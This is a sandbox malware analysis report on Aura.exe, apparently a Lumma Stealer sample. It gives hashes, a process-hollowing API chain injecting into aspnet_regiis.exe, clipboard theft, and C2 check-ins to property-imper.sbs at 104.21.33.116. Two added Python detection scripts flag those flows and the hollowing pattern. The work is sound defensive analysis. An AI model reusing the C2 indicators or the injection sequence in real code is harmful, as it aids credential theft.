Windows Analysis Report
Aura.exe

Overview

General Information

Sample name: Aura.exe
Analysis ID: 1561474
MD5: 137e48d526e2a840e07d309edffaca30
SHA1: 294d908562372639119ff5fc7e0e4c8b528bd3f7
SHA256: 18344d1186a130b07d7f6da7fd4164ae5e03863873df9872bdd4151abef46df3
Tags: exe, user-4k95m

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Aura.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 137E48D526E2A840E07D309EDFFACA30)
    • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 1992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • WerFault.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • SIHClient.exe (PID: 1992 cmdline: C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Aura.exe PID: 2836 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-23T14:17:47.880345+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP
    2024-11-23T14:17:50.300714+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 104.21.33.116 | 443 | TCP
    2024-11-23T14:17:49.331302+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP
    2024-11-23T14:17:49.331302+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 104.21.33.116 | 443 | TCP

    AV Detection

    Source: Aura.exe | ReversingLabs: Detection: 36%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\gdi32.dll | Joe Sandbox ML: detected
    Source: Aura.exe | Joe Sandbox ML: detected
    Source: Aura.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: Aura.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\user\Desktop\Aura.PDB | source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb | source: Aura.exe, 00000000.00000002.2367587213.0000000000B41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb, Cg | source: Aura.exe, 00000000.00000002.2367587213.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb | source: Aura.exe, 00000000.00000002.2367587213.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb | source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdbP | source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb | source: WERC939.tmp.dmp.6.dr
    Source: Binary string: n0C:\Windows\mscorlib.pdb | source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS | source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdb@ | source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDC4FD2 FindFirstFileExW (0_2_6CDC4FD2)
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h (0_2_00394810)
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 4x nop then mov byte ptr [ebx], al (0_2_00372D30)
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx-32907D79h] (0_2_0037F9E0)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx] (3_2_027C1670)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movsx eax, byte ptr [ebp+ecx+00h] (3_2_027C1670)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax (3_2_027A1660)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h] (3_2_0279F250)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edx], bl (3_2_02789630)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov esi, edx (3_2_0278A220)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx (3_2_027AA6E0)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al (3_2_027A06B0)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov eax, edx (3_2_0278A2A5)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx-32907D79h] (3_2_027AD360)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh (3_2_02781F00)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ebx-652DDA2Ah] (3_2_02789300)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+36h] (3_2_027A7C30)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx (3_2_027BD000)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax (3_2_02787960)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h] (3_2_02787960)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, word ptr [ecx] (3_2_027985C0)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h (3_2_027C2190)

    Networking

    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Joe Sandbox View | IP Address: 104.21.33.116
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.33.116:443
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: property-imper.sbs
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
    Source: unknown | HTTP traffic detected: the same POST /api request to property-imper.sbs as listed above
    Source: Aura.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
    Source: Aura.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: Aura.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Aura.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: Aura.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
    Source: Aura.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: Aura.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Aura.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: Aura.exe | String found in binary or memory: http://ocsp.digicert.com0
    Source: Aura.exe | String found in binary or memory: http://ocsp.digicert.com0A
    Source: Aura.exe | String found in binary or memory: http://ocsp.entrust.net02
    Source: Aura.exe | String found in binary or memory: http://ocsp.entrust.net03
    Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
    Source: Aura.exe | String found in binary or memory: http://www.digicert.com/CPS0
    Source: Aura.exe | String found in binary or memory: http://www.entrust.net/rpa03
    Source: aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
    Source: aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/Qq
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api%
    Source: aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiNlV&
    Source: Aura.exe | String found in binary or memory: https://www.entrust.net/rpa0
    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027B4F00 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard (3_2_027B4F00)
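The network indicators above (the two severity-1 ET MALWARE Lumma SIDs, the severity-3 JA3 rule, and the check-in shape: an 8-byte POST to /api on a .sbs host with a Chrome User-Agent sent by a .NET utility, not a browser) are easiest to act on once the Suricata EVE records are folded together per flow. The script below is an added example, not Joe Sandbox or Suricata code. SAMPLE_EVE is constructed to mirror the alert table in this report; the http record assumes decrypted visibility of the TLS 1.2 session (as the sandbox had, a plain sensor sees only the tls record), and its request_body_len field is an assumption rather than a real EVE field name.

```python
"""Group Suricata EVE records by flow and apply the network indicators from the
report: the two severity-1 ET MALWARE Lumma SIDs, the severity-3 JA3 rule, and
the check-in shape (tiny POST to /api with a browser User-Agent). Added example,
not Joe Sandbox or Suricata code. SAMPLE_EVE is constructed to mirror the
report's alert table; the http record assumes decrypted visibility (as the
sandbox had) and 'request_body_len' is an assumed, not a real, EVE field."""
import json
from collections import defaultdict

KNOWN_C2_SIDS = {2049836, 2054653}   # ET MALWARE Lumma Stealer rules in the report
LOWFI_JA3_SIDS = {2028371}           # ET JA3 Hash rule, severity 3: corroboration only
WATCHED_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}
BROWSER_UA_MARKERS = ("Mozilla/5.0", "Chrome/", "Firefox/")


def _rec(ts, sport, etype, **body):
    """Build one constructed EVE JSON line for the 192.168.2.5 -> 104.21.33.116:443 flows."""
    base = {"timestamp": ts, "event_type": etype, "src_ip": "192.168.2.5",
            "src_port": sport, "dest_ip": "104.21.33.116", "dest_port": 443,
            "proto": "TCP"}
    base.update(body)
    return json.dumps(base)


SAMPLE_EVE = [  # constructed EVE lines mirroring the report's Suricata table
    _rec("2024-11-23T14:17:47.880345+0100", 49708, "alert", alert={
        "signature_id": 2028371, "severity": 3, "category": "Unknown Traffic",
        "signature": "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"}),
    _rec("2024-11-23T14:17:47.900000+0100", 49708, "tls", tls={
        "version": "TLS 1.2", "sni": "property-imper.sbs",
        "ja3": {"hash": "a0e9f5d64349fb13191bc781f81f42e1"}}),
    _rec("2024-11-23T14:17:49.000000+0100", 49708, "http", http={
        "hostname": "property-imper.sbs", "url": "/api", "http_method": "POST",
        "http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                           "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
        "request_body_len": 8}),
    _rec("2024-11-23T14:17:49.331302+0100", 49708, "alert", alert={
        "signature_id": 2049836, "severity": 1, "category": "A Network Trojan was detected",
        "signature": "ET MALWARE Lumma Stealer Related Activity"}),
    _rec("2024-11-23T14:17:49.331302+0100", 49708, "alert", alert={
        "signature_id": 2054653, "severity": 1, "category": "A Network Trojan was detected",
        "signature": "ET MALWARE Lumma Stealer CnC Host Checkin"}),
    _rec("2024-11-23T14:17:50.300714+0100", 49710, "alert", alert={
        "signature_id": 2028371, "severity": 3, "category": "Unknown Traffic",
        "signature": "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"}),
]


def flow_key(ev):
    return (ev["src_ip"], ev["src_port"], ev["dest_ip"], ev["dest_port"], ev["proto"])


def group_flows(lines):
    """Fold alert/tls/http records into one summary per 5-tuple."""
    flows = defaultdict(lambda: {"sids": set(), "severity": 4, "ja3": None, "http": None})
    for line in lines:
        ev = json.loads(line)
        f = flows[flow_key(ev)]
        if ev["event_type"] == "alert":
            f["sids"].add(ev["alert"]["signature_id"])
            f["severity"] = min(f["severity"], ev["alert"]["severity"])
        elif ev["event_type"] == "tls":
            f["ja3"] = ev["tls"].get("ja3", {}).get("hash")
        elif ev["event_type"] == "http":
            f["http"] = ev["http"]
    return dict(flows)


def looks_like_checkin(http):
    """Tiny POST to /api carrying a browser UA: the check-in shape seen above."""
    if not http:
        return False
    return (http.get("http_method") == "POST" and http.get("url") == "/api"
            and http.get("request_body_len", 0) <= 16
            and any(m in http.get("http_user_agent", "") for m in BROWSER_UA_MARKERS))


def triage_flows(flows):
    """Flag a flow on a severity-1 C2 SID, or on two weaker signals together."""
    verdicts = {}
    for key, f in flows.items():
        reasons = []
        if f["sids"] & KNOWN_C2_SIDS:
            reasons.append("ET MALWARE C2 signature")
        if looks_like_checkin(f["http"]):
            reasons.append("check-in shaped POST")
        if f["sids"] & LOWFI_JA3_SIDS or f["ja3"] in WATCHED_JA3:
            reasons.append("JA3 corroboration")
        if "ET MALWARE C2 signature" in reasons or len(reasons) >= 2:
            verdicts[key] = reasons
    return verdicts
```

With the constructed input, the 49708 flow is flagged on all three reasons, while the 49710 flow carries only the severity-3 JA3 alert and is left alone: that rule is scored as corroboration because, on its own, it is the lowest-severity hit in this report.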

    System Summary

    Source: Aura.exe | Static PE information: section name: $;3F&L
    Source: Aura.exe | Static PE information: section name: (empty)
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB87F0 WindowsHandle, GetConsoleWindow, ShowWindow, VirtualAlloc, CreateProcessW, NtGetContextThread, NtAllocateVirtualMemory, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, NtSetContextThread, NtResumeThread, CloseHandle, CloseHandle, VirtualAlloc, NtWriteVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtGetContextThread, NtWriteVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, NtSetContextThread, NtResumeThread, CloseHandle, CloseHandle, VirtualAlloc (0_2_6CDB87F0)
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB6750 GetModuleHandleW, NtQueryInformationProcess, GetModuleHandleW, GetModuleHandleW (0_2_6CDB6750)
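The 0_2_6CDB87F0 call chain (CreateProcessW, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtGetContextThread/NtSetContextThread, NtCreateThreadEx, NtResumeThread) together with the process tree, where Aura.exe launches aspnet_regiis.exe with no arguments and that process then talks TLS to 104.21.33.116, is the footprint of hollowing a .NET framework utility. The script below correlates those three signals in endpoint telemetry. It is an added example, not Joe Sandbox code; the events are constructed Sysmon-style dicts (EventID 1 ProcessCreate, 3 NetworkConnect, 8 CreateRemoteThread) whose values mirror this report, and the HOLLOW_TARGETS and EXPECTED_PARENTS lists are analyst assumptions to tune per estate.

```python
"""Correlate endpoint telemetry for the hollowing pattern the report shows:
a .NET framework utility (aspnet_regiis.exe) started with no arguments by an
unrelated parent, a remote thread created in it by that parent, and outbound
traffic from the hollowed image. Added example, not Joe Sandbox code. Events
are constructed Sysmon-style dicts (EventID 1 ProcessCreate, 3 NetworkConnect,
8 CreateRemoteThread); field names follow Sysmon, values mirror the report."""
import ntpath

# .NET Framework binaries commonly chosen as hollowing hosts (analyst assumption,
# extend as needed); all live under %WINDIR%\Microsoft.NET\Framework*\v*\
HOLLOW_TARGETS = {"aspnet_regiis.exe", "regasm.exe", "regsvcs.exe",
                  "installutil.exe", "msbuild.exe"}
# Parents from which an interactive or installer launch is plausible (assumption)
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "msiexec.exe", "devenv.exe",
                    "services.exe"}

SAMPLE_EVENTS = [  # constructed; PIDs and paths taken from the report's process tree
    {"EventID": 1, "ProcessId": 2836, "Image": r"C:\Users\user\Desktop\Aura.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Aura.exe"',
     "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1992,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"',
     "ParentProcessId": 2836, "ParentImage": r"C:\Users\user\Desktop\Aura.exe"},
    {"EventID": 8, "SourceProcessId": 2836, "TargetProcessId": 1992,
     "StartAddress": "0x027A1660"},
    {"EventID": 3, "ProcessId": 1992, "DestinationIp": "104.21.33.116",
     "DestinationPort": 443},
    # benign contrast: an admin registering ASP.NET from a console, with arguments
    {"EventID": 1, "ProcessId": 4100,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -i',
     "ParentProcessId": 900, "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def _base(path):
    return ntpath.basename(path).lower()


def is_argless(image, cmdline):
    """True when the command line is just the (optionally quoted) image path."""
    return cmdline.strip().strip('"').lower() == image.lower()


def correlate(events):
    """Return {pid: [reasons]} for hollow-target processes showing >= 2 signals."""
    creates = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    findings = {}
    for pid, e in creates.items():
        if _base(e["Image"]) not in HOLLOW_TARGETS:
            continue
        reasons = []
        if is_argless(e["Image"], e["CommandLine"]):
            reasons.append("launched without arguments")
        if _base(e["ParentImage"]) not in EXPECTED_PARENTS:
            reasons.append("unexpected parent " + _base(e["ParentImage"]))
        for x in events:
            if (x["EventID"] == 8 and x["TargetProcessId"] == pid
                    and x["SourceProcessId"] == e["ParentProcessId"]):
                reasons.append("remote thread created by parent")
            elif x["EventID"] == 3 and x["ProcessId"] == pid:
                reasons.append("network connection to %s:%d"
                               % (x["DestinationIp"], x["DestinationPort"]))
        if len(reasons) >= 2:      # one signal alone is too noisy to page on
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, why in correlate(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(why))
```

Two caveats from this report itself: the chain also drives the suspended primary thread via NtSetContextThread/NtResumeThread, which creates no new thread and so produces no EventID 8, which is why the argument-less spawn and the network signal are weighted alongside it; and the process tree lists both aspnet_regiis.exe and SIHClient.exe with PID 1992, so on real Sysmon data key on ProcessGuid rather than the reused PID.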
    Source: C:\Windows\System32\SIHClient.exe | File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP11BB.tmp
    Source: C:\Windows\System32\SIHClient.exe | File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP1E79.tmp
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_00372AB0
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_003720F0
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_00372D30
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_0038FB10
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_00387160
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_00373F40
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_0038CD90
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_00387390
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_0038BFF0
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB1530
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB87F0
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB6750
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB1000
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDB8290
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDC0A10
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_6CDCAFA1
    Source: C:\Users\user\Desktop\Aura.exe | Code function: 0_2_0038E0D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BA710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278D3D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278B0D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279FA70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027C1670
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02785E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A1660
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02786E50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279F250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BAE50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A8640
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027886E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027AA6E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027B4AE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02789AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A06B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278E73F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02786320
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027827F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027C2FF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027B9BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02782B90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02783F80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027C2780
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02799450
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A7C30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A0430
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BD000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A18C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BB4B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BD490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279A08D
